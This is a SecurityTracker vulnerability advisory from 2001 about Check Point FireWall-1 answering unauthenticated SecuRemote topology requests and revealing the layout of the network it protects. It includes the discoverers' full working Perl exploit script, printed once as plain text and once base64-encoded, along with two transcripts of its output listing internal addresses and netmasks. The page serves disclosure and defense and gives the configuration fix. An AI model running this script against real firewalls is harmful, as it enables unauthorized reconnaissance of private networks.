SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Firewall)  >   FireWall-1/VPN-1 Vendors:   Check Point
Check Point FireWall-1 May Disclose Protected Network Topology to Remote Users in Certain Configurations
SecurityTracker Alert ID:  1002039
SecurityTracker URL:  http://securitytracker.com/id/1002039
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 18 2001
Impact:   Disclosure of system information
Exploit Included:  Yes  
Version(s): see the alert text below
Description:   A vulnerability has been reported in Check Point FireWall-1 that allows remote users to obtain a network topology of the protected network in certain configurations when SecuRemote is used.

When the Policy Properties "respond to unauthenticated topology requests" option is checked, the firewall will provide a network topology of the protected network to the SecuRemote remote firewall access client. The firewall will also provide this information to remote users that request it (some demonstration exploit code is included in the Source Message).

Prior to 4.1SP1 (CP2000), the default policy apparently was to automatically respond to unauthenticated topology downloads. In more recent versions, the option must be explicity enabled. This vulnerable option is reportedly required to use FWZ encryption for SecuRemote.

The following is an exploit transcript that demonstrates the type of information that is available, including ip addresses and network masks.

SensePost# perl sr.pl firewall.victim.com
Testing on port 256
:val (
:reply (
: (-SensePost-dotcom-.hal9000-19.3.167.186
:type (gateway)
:is_fwz (true)
:is_isakmp (true)
:certificates ()
:uencapport (2746)
:fwver (4.1)
:ipaddr (19.3.167.186)
:ipmask (255.255.255.255)
:resolve_multiple_interfaces ()
:ifaddrs (
: (16.3.167.186)
: (12.20.240.1)
: (16.3.170.1)
: (29.203.37.97)
)
:firewall (installed)
:location (external)
:keyloc (remote)
:userc_crypt_ver (1)
:keymanager (
:type (refobj)
:refname ("#_-SensePost-dotcom-")

) :name
(-SensePost-dotcom-Neo16.3.167.189)
:type (gateway)
:ipaddr (172.29.0.1)
:ipmask (255.255.255.255)
)
--snip--

Impact:   A remote user can obtain information about the protected network when SecuRemote is enabled and, for versions 4.1SP1 and later, when the "respond to unauthenticated topology requests" option is enabled.
Solution:   Upgrade to 4.1SP1 or later and uncheck the "respond to unauthenticated topology requests" option in the Policy Properties.
Vendor URL:  www.checkpoint.com/techsupport/alerts/ (Links to External Site)
Cause:   Configuration error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Additional Details) Re: Check Point FireWall-1 May Disclose Protected Network Topology to Remote Users in Certain Configurations
A user provides some additional details.



 Source Message Contents

Subject:  RE: Firewall-1 Information leak

Checkpoint Firewall-1 makes use of a piece of software called SecureRemote
to create encrypted sessions between users and FW-1 modules. Before remote
users are able to communicate with internal hosts, a network topology of
the protected network is downloaded to the client. While newer versions of
the FW-1 software have the ability to restrict these downloads to only
authenticated sessions, the default setting allows unauthenticated
requests to be honoured. This gives a potential attacker a wealth of
information including ip addresses, network masks (and even friendly
descriptions)

The attached file will connect to the firewall, and download the
toplogy (if SecureRemote is running)
(it is a tiny perl file, which needs only Socket, so avoids the hassle of
having to install the SecureRemote client <or booting windows> to test a
firewall-1) 

--snip--
SensePost# perl sr.pl firewall.victim.com
Testing  on port 256
        :val (
                :reply (
                        : (-SensePost-dotcom-.hal9000-19.3.167.186
                                :type (gateway)
                                :is_fwz (true)
                                :is_isakmp (true)
                                :certificates ()
                                :uencapport (2746)
                                :fwver (4.1)
                                :ipaddr (19.3.167.186)
                                :ipmask (255.255.255.255)
                                :resolve_multiple_interfaces ()
                                :ifaddrs (
                                        : (16.3.167.186)
                                        : (12.20.240.1)
                                        : (16.3.170.1)
                                        : (29.203.37.97)
                                )
                                :firewall (installed)
                                :location (external)
                                :keyloc (remote)
                                :userc_crypt_ver (1)
                                :keymanager (
                                        :type (refobj)
                                        :refname ("#_-SensePost-dotcom-")

)                               :name
                                (-SensePost-dotcom-Neo16.3.167.189)
                                                :type (gateway)
                                                :ipaddr (172.29.0.1)
                                                :ipmask (255.255.255.255)
                                        )
        
--snip-- 

Haroon Meer
+27 837866637
haroon@sensepost.com
http://www.sensepost.com


[Editor's Note:  The following encoded file has been decoded
 for your convenience.]

#!/usr/bin/perl
# A Command-line tool that can be used to download network Topology
# from Firewall-1's running SecureRemote, with the option "Allow un
# authenticated cleartext topology downloads".
# Usage sr.pl IP
# Haroon Meer & Roelof Temmingh 2001/07/17
# haroon@sensepost.com - http://www.sensepost.com

use Socket;
if ($#ARGV<0) {die "Usage: sr.pl IP\n";}

$port=256;
$target=inet_aton($ARGV[0]);
print "Testing $host on port $port\n";

$SENDY="410000000259052100000004c41e43520000004e28746f706f6c6f67792d726571756573740a093a63616e616d6520282d53656e7365506f73742d646f74636f6d2d290a093a6368616c6c656e67652028633265323331383339643066290a290a00";
$SENDY = pack("H*",$SENDY);

@results=sendraw($SENDY);

if ($#results == 0) {
 print "No results on port 256 - trying 264\n";
 $port=264;
 @results2=sendraw($SENDY); 
 if ($#results2 == 0) {die "Sorry - no results\n";}
} else {print @results;}

sub sendraw {
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,$port,$target)){
  my @in;
  select(S);      $|=1;   print $pstr;
  while(<S>){ push @in, $_;}
  select(STDOUT); close(S); return @in;
 } else { return ""; }
}
# Spidermark: sensepostdata fw1







--0-2039710078-995418972=:16828
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="sr.pl"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.BSF.4.21.0107180316120.16828@snitterly.sensepost.com>
Content-Description: 
Content-Disposition: ATTACHMENT; FILENAME="sr.pl"

IyEvdXNyL2Jpbi9wZXJsDQojIEEgQ29tbWFuZC1saW5lIHRvb2wgdGhhdCBj
YW4gYmUgdXNlZCB0byBkb3dubG9hZCBuZXR3b3JrIFRvcG9sb2d5DQojIGZy
b20gRmlyZXdhbGwtMSdzIHJ1bm5pbmcgU2VjdXJlUmVtb3RlLCB3aXRoIHRo
ZSBvcHRpb24gIkFsbG93IHVuDQojIGF1dGhlbnRpY2F0ZWQgY2xlYXJ0ZXh0
IHRvcG9sb2d5IGRvd25sb2FkcyIuDQojIFVzYWdlIHNyLnBsIElQDQojIEhh
cm9vbiBNZWVyICYgUm9lbG9mIFRlbW1pbmdoIDIwMDEvMDcvMTcNCiMgaGFy
b29uQHNlbnNlcG9zdC5jb20gLSBodHRwOi8vd3d3LnNlbnNlcG9zdC5jb20N
Cg0KdXNlIFNvY2tldDsNCmlmICgkI0FSR1Y8MCkge2RpZSAiVXNhZ2U6IHNy
LnBsIElQXG4iO30NCg0KJHBvcnQ9MjU2Ow0KJHRhcmdldD1pbmV0X2F0b24o
JEFSR1ZbMF0pOw0KcHJpbnQgIlRlc3RpbmcgJGhvc3Qgb24gcG9ydCAkcG9y
dFxuIjsNCg0KJFNFTkRZPSI0MTAwMDAwMDAyNTkwNTIxMDAwMDAwMDRjNDFl
NDM1MjAwMDAwMDRlMjg3NDZmNzA2ZjZjNmY2Nzc5MmQ3MjY1NzE3NTY1NzM3
NDBhMDkzYTYzNjE2ZTYxNmQ2NTIwMjgyZDUzNjU2ZTczNjU1MDZmNzM3NDJk
NjQ2Zjc0NjM2ZjZkMmQyOTBhMDkzYTYzNjg2MTZjNmM2NTZlNjc2NTIwMjg2
MzMyNjUzMjMzMzEzODMzMzk2NDMwNjYyOTBhMjkwYTAwIjsNCiRTRU5EWSA9
IHBhY2soIkgqIiwkU0VORFkpOw0KDQpAcmVzdWx0cz1zZW5kcmF3KCRTRU5E
WSk7DQoNCmlmICgkI3Jlc3VsdHMgPT0gMCkgew0KIHByaW50ICJObyByZXN1
bHRzIG9uIHBvcnQgMjU2IC0gdHJ5aW5nIDI2NFxuIjsNCiAkcG9ydD0yNjQ7
DQogQHJlc3VsdHMyPXNlbmRyYXcoJFNFTkRZKTsgDQogaWYgKCQjcmVzdWx0
czIgPT0gMCkge2RpZSAiU29ycnkgLSBubyByZXN1bHRzXG4iO30NCn0gZWxz
ZSB7cHJpbnQgQHJlc3VsdHM7fQ0KDQpzdWIgc2VuZHJhdyB7DQogbXkgKCRw
c3RyKT1AXzsNCiBzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHBy
b3RvYnluYW1lKCd0Y3AnKXx8MCkgfHwgZGllKCJTb2NrZXQgcHJvYmxlbXNc
biIpOw0KIGlmKGNvbm5lY3QoUyxwYWNrICJTbkE0eDgiLDIsJHBvcnQsJHRh
cmdldCkpew0KICBteSBAaW47DQogIHNlbGVjdChTKTsgICAgICAkfD0xOyAg
IHByaW50ICRwc3RyOw0KICB3aGlsZSg8Uz4peyBwdXNoIEBpbiwgJF87fQ0K
ICBzZWxlY3QoU1RET1VUKTsgY2xvc2UoUyk7IHJldHVybiBAaW47DQogfSBl
bHNlIHsgcmV0dXJuICIiOyB9DQp9DQojIFNwaWRlcm1hcms6IHNlbnNlcG9z
dGRhdGEgZncxDQoNCg0K
--0-2039710078-995418972=:16828--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC